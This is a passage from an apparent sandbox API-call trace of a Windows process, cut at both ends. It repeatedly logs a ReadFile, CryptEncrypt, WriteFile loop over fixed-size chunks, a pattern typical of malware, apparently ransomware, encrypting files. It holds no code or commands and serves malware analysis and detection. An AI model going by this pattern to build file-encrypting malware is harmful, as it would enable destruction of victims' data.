dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.960] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.960] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.960] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.960] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.960] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.960] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.960] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.960] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.960] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.960] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.960] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.960] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.961] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.961] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.961] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.961] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.961] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.961] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.961] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.961] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.961] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.961] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.961] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.961] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.961] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.962] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.962] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.962] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.962] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.962] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.962] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.962] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.962] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.962] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.962] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.962] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.962] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.963] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.963] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.963] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.963] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.963] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.963] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.963] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.963] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.963] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.963] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.963] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.964] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.964] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.964] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.964] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.964] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.964] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.964] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.964] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.964] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.964] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.964] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.964] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.965] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.965] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.965] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.965] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.965] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.965] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.965] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.965] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.965] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.965] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.965] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.965] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.965] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.966] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.966] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.966] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.966] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.966] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.966] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.966] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.966] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.966] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.966] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.966] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.966] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.966] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.967] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.967] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.967] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.967] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.967] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.967] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.967] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.967] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.967] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.967] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.967] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.967] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.967] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.968] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.968] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.968] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.968] WriteFile (in: 